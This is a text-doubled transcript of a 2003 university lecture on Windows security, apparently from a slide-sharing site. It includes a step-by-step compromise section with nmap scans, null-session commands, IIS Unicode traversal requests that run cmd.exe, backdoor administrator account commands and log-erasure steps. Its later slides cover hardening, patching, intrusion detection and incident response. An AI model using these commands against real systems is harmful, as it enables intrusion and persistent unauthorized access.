Windows Security Analysis Computer Science E-Commerce Security ‘2003’
-
Upload
ori-rowland -
Category
Documents
-
view
20 -
download
1
description
Transcript of Windows Security Analysis Computer Science E-Commerce Security ‘2003’
Slide 1
1
Windows Security AnalysisComputer Science E-Commerce Security ‘2003’
Matthew Cookhttp://escarpment.net/
Slide 2
2
IntroductionIntroduction
Loughborough UniversityLoughborough Universityhttp://www.lboro.ac.uk/computing/http://www.lboro.ac.uk/computing/
Bandwidth Management Advisory ServiceBandwidth Management Advisory Servicehttp://bmas.ja.net/http://bmas.ja.net/
Slide 3
3
Windows Security AnalysisWindows Security Analysis
IntroductionIntroduction Step-by-step Machine CompromiseStep-by-step Machine Compromise Preventing AttackPreventing Attack Incident ResponseIncident Response Further ReadingFurther Reading
Slide 4
4
IntroductionIntroduction
Basic Security OverviewBasic Security Overview
Slide 5
5
Physical SecurityPhysical Security
Secure LocationSecure Location BIOS restrictionsBIOS restrictions Password ProtectionPassword Protection Boot DevicesBoot Devices Case LocksCase Locks Case PanelsCase Panels
Slide 6
6
Security ThreatsSecurity Threats
Denial of ServiceDenial of Service Theft of informationTheft of information ModificationModification Fabrication (Spoofing or Masquerading)Fabrication (Spoofing or Masquerading)
Slide 7
7
Security Threats…Security Threats…
Why a compromise can occur:Why a compromise can occur: Physical Security HolesPhysical Security Holes Software Security HolesSoftware Security Holes Incompatible Usage Security HolesIncompatible Usage Security Holes Social EngineeringSocial Engineering ComplacencyComplacency
Slide 8
8
The Easiest Security ImprovementThe Easiest Security Improvement
Good passwordsGood passwords Usernames and Passwords are the primary Usernames and Passwords are the primary
security defencesecurity defence
Use a password that is easy to type to avoid Use a password that is easy to type to avoid ‘Shoulder Surfers’‘Shoulder Surfers’
Use the first letters from song titles, song Use the first letters from song titles, song lyrics or film quotationslyrics or film quotations
Slide 9
9
Can you buy Security?Can you buy Security?
““This system is secure.”This system is secure.” A product vendor A product vendor might say: might say: “This product makes your “This product makes your network secure.”network secure.” Or: Or: “We secure e-“We secure e-commerce.”commerce.” Inevitably, these claims are Inevitably, these claims are naïve and simplistic. They look at the naïve and simplistic. They look at the security of the product, rather than the security of the product, rather than the security of the system. The first questions to security of the system. The first questions to ask are: ask are: “Secure from whom?”“Secure from whom?” and and “Secure against what?”“Secure against what?”
Bruce SchneierBruce Schneier
Slide 10
10
Step-by-step Machine Step-by-step Machine CompromiseCompromise
Why, where, how?Why, where, how?
Slide 11
11
BackgroundBackground
Reasons for Attack:Reasons for Attack:
Personal IssuesPersonal Issues Political StatementPolitical Statement Financial Gain (Theft of money, information)Financial Gain (Theft of money, information) Learning ExperienceLearning Experience DoS (Denial of Service)DoS (Denial of Service) Support for Illegal ActivitySupport for Illegal Activity
Slide 12
12
Gathering InformationGathering Information
Companies HouseCompanies House Internet SearchInternet Search
URL: URL: http://www.google.co.ukhttp://www.google.co.uk WhoisWhois
URL: URL: http://www.netsol.com/cgi-bin/whois/whoishttp://www.netsol.com/cgi-bin/whois/whois A Whois query can provide:A Whois query can provide:
– The RegistrantThe Registrant– The Domain Names RegisteredThe Domain Names Registered– The Administrative, Technical and Billing ContactThe Administrative, Technical and Billing Contact– Record updated and created date stampsRecord updated and created date stamps– DNS Servers for the DomainDNS Servers for the Domain
Slide 13
13
Gathering Information…Gathering Information…
Use Nslookup or digUse Nslookup or dig dig @<dns server> <machine address>dig @<dns server> <machine address> Different query type available:Different query type available:
– A – Network addressA – Network address– Any – All or Any Information availableAny – All or Any Information available– Mx – Mail exchange recordsMx – Mail exchange records– Soa – Zone of AuthoritySoa – Zone of Authority– Hinfo – Host informationHinfo – Host information– Axfr – Zone TransferAxfr – Zone Transfer– Txt – Additional stringsTxt – Additional strings
Slide 14
14
Identifying System WeaknessIdentifying System Weakness
Many products available:Many products available: NmapNmap NessusNessus
PandoraPandora PwdumpPwdump L0pht CrackL0pht Crack Null AuthenticationNull Authentication
Slide 15
15
NmapNmap
Port Scanning ToolPort Scanning Tool Stealth scanning, OS FingerprintingStealth scanning, OS Fingerprinting Open SourceOpen Source Runs under Unix based OSRuns under Unix based OS Port development for Win32Port development for Win32 URL: URL: http://www.insure.org/nmap/http://www.insure.org/nmap/
Slide 16
16
NmapNmap
Slide 17
17
NessusNessus
Remote security scannerRemote security scanner Very comprehensiveVery comprehensive Frequently updated modulesFrequently updated modules Testing of DoS attacksTesting of DoS attacks Open SourceOpen Source Win32 and Java ClientWin32 and Java Client URL: URL: http://nessus.org/http://nessus.org/
Slide 18
18
pwdumppwdump
Version 3 (e = encrypted)Version 3 (e = encrypted) Developed by Phil Staubs and Erik Developed by Phil Staubs and Erik
HjelmstadHjelmstad Based on pwdump and pwdump2Based on pwdump and pwdump2 URL: URL: http://www.ebiz-tech.com/html/pwdump.htmlhttp://www.ebiz-tech.com/html/pwdump.html Needs Administrative PrivilidgesNeeds Administrative Privilidges Extracts hashs even if syskey is installedExtracts hashs even if syskey is installed Extract from remote machinesExtract from remote machines Identifies accounts with no passwordIdentifies accounts with no password Self contained utilitySelf contained utility
Slide 19
19
L0pht CrackL0pht Crack
Password Auditing and RecoveryPassword Auditing and Recovery Crack Passwords from many sourcesCrack Passwords from many sources Registration $249Registration $249 URL: URL: http://www.atstake.com/research/lc3/http://www.atstake.com/research/lc3/
Slide 20
20
L0pht CrackL0pht Crack
Crack Passwords from:Crack Passwords from: Local MachineLocal Machine Remote MachineRemote Machine SAM FileSAM File SMB SnifferSMB Sniffer PWDump filePWDump file
Slide 21
21
Nmap AnalysisNmap Analysis
nmap –sP 158.125.0.0/16nmap –sP 158.125.0.0/16- Ping scan!Ping scan!
nmap –sS158.125.0.0/16nmap –sS158.125.0.0/16- Stealth scan- Stealth scan
Slide 22
22
Nmap Analysis…Nmap Analysis…
TCP Connect ScanTCP Connect Scan Completes a ‘Three Way Handshake’Completes a ‘Three Way Handshake’ Very noisy (Detection by IDS)Very noisy (Detection by IDS)
Slide 23
23
Nmap Analysis…Nmap Analysis…
TCP SYN ScanTCP SYN Scan Half open scanning (Full port TCP Half open scanning (Full port TCP
connection not made)connection not made) Less noisy than the TCP Connect ScanLess noisy than the TCP Connect Scan
Slide 24
24
Nmap Analysis…Nmap Analysis…
TCP FIN ScanTCP FIN Scan– FIN Packet sent to target portFIN Packet sent to target port– RST returned for all closed portsRST returned for all closed ports– Mostly works UNIX based TCP/IP StacksMostly works UNIX based TCP/IP Stacks
TCP Xmas Tree ScanTCP Xmas Tree Scan– Sends a FIN, URG and PUSH packetSends a FIN, URG and PUSH packet– RST returned for all closed portsRST returned for all closed ports
TCP Null ScanTCP Null Scan– Turns off all flagsTurns off all flags– RST returned for all closed portsRST returned for all closed ports
UDP ScanUDP Scan– UDP Packet sent to target portUDP Packet sent to target port– ““ICMP Port Unreachable” for closed portsICMP Port Unreachable” for closed ports
Slide 25
25
Null AuthenticationNull Authentication
Null Authentication:Null Authentication: Net use Net use \\camford\IPC$\\camford\IPC$ “” /u:“” “” /u:“” Famous tools like ‘Red Button’Famous tools like ‘Red Button’ Net view Net view \\camford\\camford
List of Users, groups and sharesList of Users, groups and shares Last logged on dateLast logged on date Last password changeLast password change Much more…Much more…
Slide 26
26
Exploiting the Security HoleExploiting the Security Hole
Using IIS Unicode/Directory TraversalUsing IIS Unicode/Directory Traversal /scripts/../../winnt/system32/cmd.exe /c+dir/scripts/../../winnt/system32/cmd.exe /c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Displays the listing of c: in browserDisplays the listing of c: in browser
Copy cmd.exe to /scripts/root.exeCopy cmd.exe to /scripts/root.exe Echo upload.aspEcho upload.asp GET /scripts/root.exe /c+echo+[blah]>upload.aspGET /scripts/root.exe /c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.aspUpload cmdasp.asp using upload.asp
Still vulnerable on 24% of E-Commerce serversStill vulnerable on 24% of E-Commerce servers
Slide 27
27
Gaining ‘Root’Gaining ‘Root’
Cmdasp.asp provides a cmd shell in the Cmdasp.asp provides a cmd shell in the SYSTEM contextSYSTEM context
Increase in privileges is now simpleIncrease in privileges is now simple
ISAPI.dll – RevertToSelf (Horovitz)ISAPI.dll – RevertToSelf (Horovitz) Version 2 coded by FoundstoneVersion 2 coded by Foundstone http://http://camford/scripts/idq.dllcamford/scripts/idq.dll? ? Patch Bulletin: MS01-26Patch Bulletin: MS01-26 NOT included in Windows 2000 SP2NOT included in Windows 2000 SP2
Slide 28
28
Backdoor AccessBackdoor Access
Create several user accountsCreate several user accounts Net user iisservice <pass> /ADDNet user iisservice <pass> /ADD Net localgroup administrators iisservice /ADDNet localgroup administrators iisservice /ADD Add root shells on high end portsAdd root shells on high end ports Tiri is 3Kb in sizeTiri is 3Kb in size Add backdoors to ‘Run’ registry keys Add backdoors to ‘Run’ registry keys
Slide 29
29
System AlterationSystem Alteration
Web page alterationWeb page alteration Information TheftInformation Theft Enable servicesEnable services Add VNCAdd VNC
Creating a Warez ServerCreating a Warez Server Net start msftpsvcNet start msftpsvc Check accessCheck access Upload file 1Mb in sizeUpload file 1Mb in size Advertise as a warez server Advertise as a warez server
Slide 30
30
Audit Trail RemovalAudit Trail Removal
Many machines have auditing disabledMany machines have auditing disabled Main problems are IIS logsMain problems are IIS logs DoS IIS before logs sync to discDoS IIS before logs sync to disc Erase logs from hard discErase logs from hard disc Erasing Eventlog harderErasing Eventlog harder
IDS SystemsIDS Systems Network Monitoring at firewallNetwork Monitoring at firewall
Slide 31
31
Preventing AttackPreventing Attack
How to stop the attack from How to stop the attack from happening and how to limit the happening and how to limit the
damage from crackers!damage from crackers!
Slide 32
32
NetBIOS/SMB ServicesNetBIOS/SMB Services
NetBIOS Browsing Request [UDP 137]NetBIOS Browsing Request [UDP 137] NetBIOS Browsing Response [UDP 138]NetBIOS Browsing Response [UDP 138] NetBIOS Communications [TCP 135]NetBIOS Communications [TCP 135] CIFS [TCP 139, 445 UDP 445]CIFS [TCP 139, 445 UDP 445] Port 445 Windows 2000 onlyPort 445 Windows 2000 only Block ports at firewallBlock ports at firewall Netstat -ANetstat -A
Slide 33
33
NetBIOS/SMB Services…NetBIOS/SMB Services…
To disable NetBIOSTo disable NetBIOS1.1. Select ‘Disable NetBIOS’ in the WINS tab Select ‘Disable NetBIOS’ in the WINS tab
of advanced TCP/IP properties.of advanced TCP/IP properties.2.2. Deselect ‘File and Print sharing’ in the Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and Dial-advanced settings of the ‘Network and Dial-up connections’ windowup connections’ window
Slide 34
34
NetBIOS/SMB Services…NetBIOS/SMB Services…
Disable Null AuthenticationDisable Null Authentication HKLM\SYSTEM\CurrentControlSet\Control\LSA\HKLM\SYSTEM\CurrentControlSet\Control\LSA\
RestrictAnonymousRestrictAnonymous REG_DWORD set to 0, 1 or REG_DWORD set to 0, 1 or 2!2! HKLM\SYSTEM\CurrentControlSet\Control\HKLM\SYSTEM\CurrentControlSet\Control\
SecurePipeServers\RestrictAnonymousSecurePipeServers\RestrictAnonymous REG_DWORD set to 0 or 1REG_DWORD set to 0 or 1
Slide 35
35
Operating System PatchingOperating System Patching
Operating Systems do contain bugs, and Operating Systems do contain bugs, and patches are a common method of distributing patches are a common method of distributing these fixes.these fixes.
A patch or hot fix usually contains a fix for A patch or hot fix usually contains a fix for one discovered bug.one discovered bug.
Service packs contain multiple patches or Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows the soon to be released SP4 for Windows 2000.2000.
Slide 36
36
Operating System Patching…Operating System Patching…
Only install patches after you have tested Only install patches after you have tested them in a development environment.them in a development environment.
Only install patches obtained direct from the Only install patches obtained direct from the vendor.vendor.
Install security patches as soon as possible Install security patches as soon as possible after released.after released.
Install feature patches as and when needed.Install feature patches as and when needed. Automate patch collection and installation as Automate patch collection and installation as
much as possible (QChain).much as possible (QChain).
Slide 37
37
Operating System Patching…Operating System Patching…
Use automated patching technology:Use automated patching technology: SUS – Microsoft Software Update ServiceSUS – Microsoft Software Update Service SMS – Microsoft Systems Management ServerSMS – Microsoft Systems Management Server Ghost – Symantec imaging software.Ghost – Symantec imaging software.
And other application deployment software:And other application deployment software: Lights out DistributionLights out Distribution Deferred installationDeferred installation
Slide 38
38
Baseline Security AnalyzerBaseline Security Analyzer
Freely available from MicrosoftFreely available from Microsoft Written by Shavlik Technologies as a direct Written by Shavlik Technologies as a direct
result of Code Red attacksresult of Code Red attacks
A GUI to HFNetChk (v3.81)A GUI to HFNetChk (v3.81) Improved feature setImproved feature set Integrated SUS functionalityIntegrated SUS functionality
Slide 39
39
Baseline Security Analyzer…Baseline Security Analyzer…
MBSA v1.1 supports the following host OS:MBSA v1.1 supports the following host OS: Windows 2000 Professional / ServerWindows 2000 Professional / Server Windows XP Home / ProfessionalWindows XP Home / Professional
Windows .NET not officially supportedWindows .NET not officially supported Windows NT not supported as host OSWindows NT not supported as host OS
Remote scanning availableRemote scanning available
Slide 40
40
Baseline Security Analyzer…Baseline Security Analyzer…
What applications does MBSA scan?What applications does MBSA scan? Operating systemOperating system Internet Explorer > 5.01Internet Explorer > 5.01 Microsoft Office 2000 and 2002Microsoft Office 2000 and 2002 Media Player > 6.4Media Player > 6.4 Internet Information Services 4.0 and 5.0Internet Information Services 4.0 and 5.0 SQL Server 7.0 and 2000SQL Server 7.0 and 2000 Exchange Server 5.5 and 2000Exchange Server 5.5 and 2000
Slide 41
41
IPSecIPSec
IP securityIP security Linux Connectivity using FreeS/WANLinux Connectivity using FreeS/WAN Mainly for wireless useMainly for wireless use WEP encryption crackedWEP encryption cracked URL: URL: http://www.freeswan.org/http://www.freeswan.org/ URL: URL: http://airsnort.sourceforge.net/http://airsnort.sourceforge.net/
Slide 42
42
Recent WormsRecent Worms
Sadmind/IISSadmind/IISDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)
CodeRedCodeRedida/idq buffer overflowida/idq buffer overflow
CodeGreenCodeGreen ida/idq buffer overflow ida/idq buffer overflow
NimdaNimdaDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)
SlammerSlammerMS SQL Server transaction controlMS SQL Server transaction control
Slide 43
43
Sadmind/IISSadmind/IIS
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22centerfont^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -html^>>../wwwroot/default.htm 200 -
Slide 44
44
IDS SnortIDS Snort
IDS – Intrusion Detection SystemIDS – Intrusion Detection System Libpcap packet sniffer and loggerLibpcap packet sniffer and logger Originally developed for the Unix platformsOriginally developed for the Unix platforms Open SourceOpen Source Port to Win32 available (Release 1.8.1)Port to Win32 available (Release 1.8.1) Installation on Win32 in under 30 minutesInstallation on Win32 in under 30 minutes Run on your IIS server or standaloneRun on your IIS server or standalone
Slide 45
45
IDS Snort…IDS Snort…
Snort can detect:Snort can detect: Stealth Port ScansStealth Port Scans CGI AttacksCGI Attacks Front Page Extensions AttacksFront Page Extensions Attacks ICMP ActivityICMP Activity SMTP ActivitySMTP Activity SQL ActivitySQL Activity SMB ProbesSMB Probes
Slide 46
46
Incident ResponseIncident Response
What to do when something does What to do when something does go wrong!go wrong!
Slide 47
47
Incident Response…Incident Response…
Don’t Panic!Don’t Panic! Unplug the networkUnplug the network Get a notebookGet a notebook Back-up the system and keep the Back-upsBack-up the system and keep the Back-ups Restrict use of emailRestrict use of email Look for informationLook for information Investigate the causeInvestigate the cause
Request help and assistance.Request help and assistance.
Slide 48
48
Incident Response…Incident Response…
Important to return to service swiftlyImportant to return to service swiftly– Do not jeopardize securityDo not jeopardize security– If in doubt, re-buildIf in doubt, re-build– Perform forensics on a backupPerform forensics on a backup
Keep documentation and evidenceKeep documentation and evidence Contact local CERT if investigation proves Contact local CERT if investigation proves
non worm/script kiddie activity.non worm/script kiddie activity.
Slide 49
49
Further ReadingFurther Reading
Garfinkel, S. Web Security & CommerceGarfinkel, S. Web Security & CommerceO’ReillyO’Reilly [ISBN 1-56592-269-7] [ISBN 1-56592-269-7]
Hassler, V. Security Fundamentals for E-Hassler, V. Security Fundamentals for E-Commerce Commerce Artech HouseArtech House [ISBN 1-58053-108-3] [ISBN 1-58053-108-3]
Huth, M R A. Secure Communicating Systems Huth, M R A. Secure Communicating Systems Cambridge Uni PressCambridge Uni Press [ISBN 0-52180-731-X] [ISBN 0-52180-731-X]
Schneier, B. Schneier, B. Secrets & Lies (Digital Security in Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]a Networked World) [ISBN 0-47125-311-1]
Slide 50
50
Useful Books, Tools and URLsUseful Books, Tools and URLs
Securing Windows NT/2000 Servers for the Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.)Internet. (Stefan Norberg.)
Incident Response. (Kenneth R. van Wyk, Incident Response. (Kenneth R. van Wyk, Richard Forno.)Richard Forno.)
Hacking Exposed: Network Security Secrets Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al)& Solutions. (Stuart McClure et al)
Hacking Exposed Windows 2000: Network Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)Security Secrets and Solutions. (Scambray.)
Slide 51
51
Useful Books, Tools and URLsUseful Books, Tools and URLs
Microsoft Security WebsiteMicrosoft Security Websitehttp://www.microsoft.com/security/http://www.microsoft.com/security/
Computer Security Incident Response TeamComputer Security Incident Response Teamhttp://www.cert.org/csirts/csirt_faq.htmlhttp://www.cert.org/csirts/csirt_faq.html
JANET CERTJANET CERThttp://www.ja.net/cert/http://www.ja.net/cert/
Bugtraq Mailing ListBugtraq Mailing Listhttp://http://online.securityfocus.comonline.securityfocus.com//
Slide 52
52
QuestionsQuestions
Slides available at:Slides available at:http://escarpment.net/http://escarpment.net/